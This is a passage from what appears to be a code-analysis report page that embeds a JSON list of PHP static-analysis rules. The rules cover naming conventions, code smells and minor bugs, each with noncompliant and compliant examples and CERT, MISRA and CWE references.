3\n#endif\n<\/pre>","status":"READY","tags":["rank5"],"langName":"Swift","params":[],"type":"CODE_SMELL"}],"language":"swift","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};
      Severity: Minor
      Found in docs/swift.html by fixme

      BUG found
      Open

              window.data = {"total":112,"p":1,"ps":500,"rules":[{"key":"common-php:DuplicatedBlocks","repo":"common-php","name":"Source files should not have any duplicated blocks","htmlDesc":"An issue is created on a file as soon as there is at least one block of duplicated code on this file","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"common-php:FailedUnitTests","repo":"common-php","name":"Failed unit tests should be fixed","htmlDesc":"Test failures or errors generally indicate that regressions have been introduced. Those tests should be handled as soon as possible to reduce the cost to fix the corresponding regressions.","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"common-php:InsufficientCommentDensity","repo":"common-php","name":"Source files should have a sufficient density of comment lines","htmlDesc":"An issue is created on a file as soon as the density of comment lines on this file is less than the required threshold. The number of comment lines to be written in order to reach the required threshold is provided by each issue message.","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"minimumCommentDensity","defaultValue":"25","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:InsufficientLineCoverage","repo":"common-php","name":"Lines should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the line coverage on this file is less than the required threshold. It gives the number of lines to be covered in order to reach the required threshold.","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"minimumLineCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:SkippedUnitTests","repo":"common-php","name":"Skipped unit tests should be either removed or fixed","htmlDesc":"Skipped unit tests are considered as dead code. 
Either they should be activated again (and updated) or they should be removed.","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S100","repo":"php","name":"Function names should comply with a naming convention","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks that all function names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression: <code>^[a-z][_a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nfunction DoSomething(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(){...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Methods with an <code>@inheritdoc<\/code> annotation, as well as magic methods (<code>__construct()<\/code>, <code>__destruct()<\/code>,\n<code>__call()<\/code>, <code>__callStatic()<\/code>, <code>__get()<\/code>, <code>__set()<\/code>, <code>__isset()<\/code>, <code>__unset()<\/code>,\n<code>__sleep()<\/code>, <code>__wakeup()<\/code>, <code>__toString()<\/code>, <code>__invoke()<\/code>, <code>__set_state()<\/code>,\n<code>__clone()<\/code>, <code>__debugInfo()<\/code>) are ignored.<\/p>\n<pre>\nfunction __construct(){...}\nfunction __destruct(){...}\n\n\/**\n * {@inheritdoc}\n *\/\nfunction myFunc(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the function names against","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S101","repo":"php","name":"Class names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. 
This rule allows to check that all class\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass my_class {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the class names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S103","repo":"php","name":"Lines should not be too long","htmlDesc":"<p>Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.<\/p>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"maximumLineLength","htmlDesc":"The maximum authorized line length.","defaultValue":"120","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S105","repo":"php","name":"Tabulation characters should not be used","htmlDesc":"<p>Developers should not need to configure the tab width of their text editors in order to be able to read source code.<\/p>\n<p>So the use of tabulation character must be banned.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1066","repo":"php","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n  if (condition2) {\n    ...\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1 &amp;&amp; condition2) {\n  ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1067","repo":"php","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&amp;&amp;<\/code>, <code>||<\/code> and 
<code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold value of 3<\/p>\n<pre>\nif ((($condition1 &amp;&amp; $condition2) || ($condition3 &amp;&amp; $condition4)) &amp;&amp; $condition5) { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ( (my_first_condition() || my_second_condition()) &amp;&amp; my_last_condition()) { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1068","repo":"php","name":"Unused \"private\" fields should be removed","htmlDesc":"<p>If a <code>private<\/code> field is declared but not used in the program, it can be considered dead code and should therefore be removed. This will\nimprove maintainability because developers will not wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass {\n  private $foo = 4;                       \/\/foo is unused\n\n  public function compute($a) {\n    return $a * 4;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n\n  public function compute($a) {\n    return $a * 4;\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S107","repo":"php","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 
parameters:<\/p>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4, $param5) {\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"},{"key":"constructorMax","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S108","repo":"php","name":"Nested blocks of code should not be left empty","htmlDesc":"<p>Most of the time a block of code is empty when a piece of code is really missing. So such empty block must be either filled or removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 42; $i++){}  \/\/ Empty on purpose or missing piece of code ?\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a block contains a comment, this block is not considered to be empty.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1105","repo":"php","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition)\n{\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (left and right curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1109","repo":"php","name":"A close curly brace should be located at the beginning of a line","htmlDesc":"<p>Shared coding conventions make it possible for a team to efficiently collaborate. 
This rule makes it mandatory to place a close curly brace at the\nbeginning of a line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition) {\n  doSomething();}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (open and close curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1116","repo":"php","name":"Empty statements should be removed","htmlDesc":"<p>Empty statements, i.e. <code>;<\/code>, are usually introduced by mistake, for example because:<\/p>\n<ul>\n  <li> It was meant to be replaced by an actual statement, but this was forgotten. <\/li>\n  <li> There was a typo which lead the semicolon to be doubled, i.e. <code>;;<\/code>. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n  ;                                              \/\/ Noncompliant - was used as a kind of TODO marker\n}\n\nfunction doSomethingElse($p) {\n  echo $p;;                                      \/\/ Noncompliant - double ;\n}\n\nfor ($i = 1; $i &lt;= 10; doSomething($i), $i++);   \/\/ Noncompliant - Rarely, they are used on purpose as the body of a loop. It is a bad practice to have side-effects outside of the loop body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething() {}\n\nfunction doSomethingElse($p) {\n  echo $p;\n\n  for ($i = 1; $i &lt;= 10; $i++) {\n    doSomething($i);\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment provided that\n  the first character following the null statement is a white-space character. 
<\/li>\n  <li> MISRA C++:2008, 6-2-3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment, provided\n  that the first character following the null statement is a white-space character. <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7gCTAw\">CERT, MSC51-J.<\/a> - Do not place a semicolon immediately following an if, for,\n  or while condition <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/i4FtAg\">CERT, EXP15-C.<\/a> - Do not place a semicolon on the same line as an if, for,\n  or while statement <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1117","repo":"php","name":"Local variables should not have the same name as class fields","htmlDesc":"<p>Shadowing fields with a local variable is a bad practice that reduces code readability: it makes it confusing to know whether the field or the\nvariable is being used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n  public $myField;\n\n  public function doSomething() {\n    $myField = 0;\n    ...\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/2ADEAw\">CERT, DCL51-J.<\/a> - Do not shadow or obscure identifiers in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S112","repo":"php","name":"Generic exceptions ErrorException, RuntimeException and Exception should not be thrown","htmlDesc":"<p>If you throw a general exception type, such as ErrorException, RuntimeException, or Exception in a 
library or framework, it forces consumers to\ncatch all exceptions, including unknown exceptions that they do not know how to handle.<\/p>\n<p>Instead, either throw a subtype that already exists in the Standard PHP Library, or create your own type that derives from Exception.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthrow new Exception();  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nthrow new InvalidArgumentException();\n\/\/ or\nthrow new UnexpectedValueException();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/397.html\">MITRE, CWE-397<\/a> - Declaration of Throws for Generic Exception <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/BoB3AQ\">CERT, ERR07-J.<\/a> - Do not throw RuntimeException, Exception, or Throwable\n  <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1124","repo":"php","name":"Modifiers should be declared in the correct order","htmlDesc":"<p>The PSR2 standard recommends listing modifiers in the following order to improve the readability of PHP source code:<\/p>\n<ol>\n  <li> final or abstract <\/li>\n  <li> public or protected or private <\/li>\n  <li> static <\/li>\n<\/ol>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstatic protected $foo;\n...\npublic static final function bar(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprotected static $foo;\n...\nfinal public static function bar(){...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1125","repo":"php","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($booleanVariable == true) { \/* ... *\/ }\nif ($booleanVariable != true) { \/* ... *\/ }\nif ($booleanVariable || false) { \/* ... 
*\/ }\ndoSomething(!false);\n\n$booleanVariable = condition ? true : exp;\n$booleanVariable = condition ? false : exp;\n$booleanVariable = condition ?  exp : true;\n$booleanVariable = condition ?  exp : false;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($booleanVariable) { \/* ... *\/ }\nif (!$booleanVariable) { \/* ... *\/ }\nif ($booleanVariable) { \/* ... *\/ }\ndoSomething(true);\n\n$booleanVariable = condition || exp;\n$booleanVariable = !condition &amp;&amp; exp;\n$booleanVariable = !condition ||  exp;\n$booleanVariable = condition &amp;&amp; exp;\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1126","repo":"php","name":"Return of boolean expressions should not be wrapped into an \"if-then-else\" statement","htmlDesc":"<p>Return of boolean literal statements wrapped into <code>if-then-else<\/code> ones should be simplified.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (expression) {\n  return true;\n} else {\n  return false;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nreturn expression;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S113","repo":"php","name":"Files should contain an empty new line at the end","htmlDesc":"<p>Some tools such as Git work better when files end with an empty line.<\/p>\n<p>This rule simply generates an issue if it is missing.<\/p>\n<p>For example, a Git diff looks like this if the empty line is missing at the end of the file:<\/p>\n<pre>\n+class Test {\n+}\n\\ No newline at end of file\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1131","repo":"php","name":"Lines should not end with trailing whitespaces","htmlDesc":"<p>Trailing whitespaces are simply useless and should not stay 
in code. They may generate noise when comparing different versions of the same\nfile.<\/p>\n<p>If you encounter issues from this rule, this probably means that you are not using an automated code formatter - which you should if you have the\nopportunity to do so. <\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1134","repo":"php","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide($numerator, $denominator) {\n  return $numerator \/ $denominator;              \/\/ FIXME denominator value might be  0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1135","repo":"php","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n  \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment 
<\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S114","repo":"php","name":"Interface names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all\ninterface names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\ninterface myInterface {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ninterface MyInterface {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the interface names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1142","repo":"php","name":"Functions should not contain too many return statements","htmlDesc":"<p>Having too many return statements in a function increases the function's essential complexity because the flow of execution is broken each time a\nreturn statement is encountered. 
This makes it harder to read and understand the logic of the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction myFunction(){ \/\/ Noncompliant as there are 4 return statements\n  if (condition1) {\n    return true;\n  } else {\n    if (condition2) {\n      return false;\n    } else {\n      return true;\n    }\n  }\n  return false;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed return statements per function","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1144","repo":"php","name":"Unused \"private\" methods should be removed","htmlDesc":"<p><code>private<\/code> methods that are never executed are dead code: unnecessary, inoperative code that should be removed. Cleaning out dead code\ndecreases the size of the maintained codebase, making it easier to understand the program and preventing bugs from being introduced.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo\n{\n  private function Foo() {}   \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n  public static function doSomething()\n  {\n    $foo = new Foo();\n    ...\n  }\n\n  private function unusedPrivateFunction() {  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo\n{\n  private function Foo(){}   \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n  public static function doSomething()\n  {\n    $foo = new Foo();\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1145","repo":"php","name":"Useless \"if(true) {...}\" and \"if(false){...}\" blocks should 
be removed","htmlDesc":"<p><code>if<\/code> statements with conditions that are always false have the effect of making blocks of code non-functional. <code>if<\/code>\nstatements with conditions that are always true are completely redundant, and make the code less readable.<\/p>\n<p>There are three possible causes for the presence of such code: <\/p>\n<ul>\n  <li> An if statement was changed during debugging and that debug code has been committed. <\/li>\n  <li> Some value was left unset. <\/li>\n  <li> Some logic is not doing what the programmer thought it did. <\/li>\n<\/ul>\n<p>In any of these cases, unconditional <code>if<\/code> statements should be removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (true) {  \/\/ Noncompliant\n  doSomething();\n}\n...\nif (false) {  \/\/ Noncompliant\n  doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomething();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571.html\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S115","repo":"php","name":"Constant names should comply with a naming convention","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. 
This rule checks that all constant names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$<\/code>:<\/p>\n<pre>\ndefine(\"const1\", true);\n\nclass Foo {\n    const const2 = \"bar\";\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndefine(\"CONST1\", true);\n\nclass Foo {\n    const CONST2 = \"bar\";\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the constant names against.","defaultValue":"^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1151","repo":"php","name":"\"switch case\" clauses should not have too many lines","htmlDesc":"<p>The <code>switch<\/code> statement should be used only to clearly define some new branches in the control flow. As soon as a <code>case<\/code>\nclause contains too many statements this highly decreases the readability of the overall control flow statement. 
In such case, the content of the\n<code>case<\/code> clause should be extracted into a dedicated method.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a threshold of 5:<\/p>\n<pre>\nswitch ($var) {\n  case 0:  \/\/ 6 lines till next case\n    methodCall1();\n    methodCall2();\n    methodCall3();\n    methodCall4();\n    break;\n  default:\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($var) {\n  case 0:\n    doSomething();\n    break;\n  default:\n    break;\n}\n\nfunction doSomething(){\n  methodCall1(\"\");\n  methodCall2(\"\");\n  methodCall3(\"\");\n  methodCall4(\"\");\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of lines","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S116","repo":"php","name":"Field names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that field\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass MyClass {\n  $my_field;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n  $myField;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the field names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S117","repo":"php","name":"Local variable and function parameter names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. 
This rule allows to check that all local\nvariable and function parameter names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\npublic function doSomething($my_param){\n  $LOCAL;\n  ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function doSomething($myParam){\n  $local;\n  ...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1172","repo":"php","name":"Unused function parameters should be removed","htmlDesc":"<p>Unused parameters are misleading. Whatever the value passed to such parameters is, the behavior will be the same.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething($a, $b) { \/\/ \"$a\" is unused\n  return compute($b);\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($b) {\n  return compute($b);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Functions in classes that override a class or implement interfaces are ignored.<\/p>\n<pre>\nclass C extends B {\n\n  function doSomething($a, $b) {     \/\/ no issue reported on $b\n    compute($a);\n  }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 0-1-11 - There shall be no unused parameters (named or unnamed) in nonvirtual functions. 
<\/li>\n  <li> MISRA C:2012, 2.7 - There should be no unused parameters in functions <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1185","repo":"php","name":"Overriding methods should do more than simply call the same method in the super class","htmlDesc":"<p>Overriding a method just to call the same method from the super class without performing any other actions is useless and misleading. The only time\nthis is justified is in <code>final<\/code> overriding methods, where the effect is to lock in the parent class behavior. This rule ignores such\noverrides of <code>equals<\/code>, <code>hashCode<\/code> and <code>toString<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Child extends Parent {\n\n  public function func($n,$m) {\n    parent::func($n$m);  \/\/ Noncompliant\n  }\n}\n\nclass Parent {\n  public function func($n, $m) {\n    \/\/ do something\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Child extends Parent {\n\n  public function func($n,$m) {\n    parent::func($n$m);\n    \/\/ do additional things...\n  }\n}\n\nclass Parent {\n  public function func($n, $m) {\n    \/\/ do something\n  }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nclass Child extends Parent {\n  \/\/ function eliminated\n}\n\nclass Parent {\n  public function func($n, $m) {\n    \/\/ do something\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1192","repo":"php","name":"String literals should not be duplicated","htmlDesc":"<p>Duplicated string literals make the process of refactoring error-prone, since you must be sure 
to update all occurrences.<\/p>\n<p>On the other hand, constants can be referenced from many places, but only need to be updated in a single place.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction run() {\n  prepare('action1');                              \/\/ Non-Compliant - 'action1' is duplicated 3 times\n  execute('action1');\n  release('action1');\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nACTION_1 = 'action1';\n\nfunction run() {\n  prepare(ACTION_1);\n  execute(ACTION_1);\n  release(ACTION_1);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>To prevent generating some false-positives, literals having less than 5 characters are excluded.<\/p>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"threshold","htmlDesc":"Number of times a literal must be duplicated to trigger an issue","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1200","repo":"php","name":"Classes should not be coupled to too many other classes (Single Responsibility Principle)","htmlDesc":"<p>According to the Single Responsibility Principle, introduced by Robert C. 
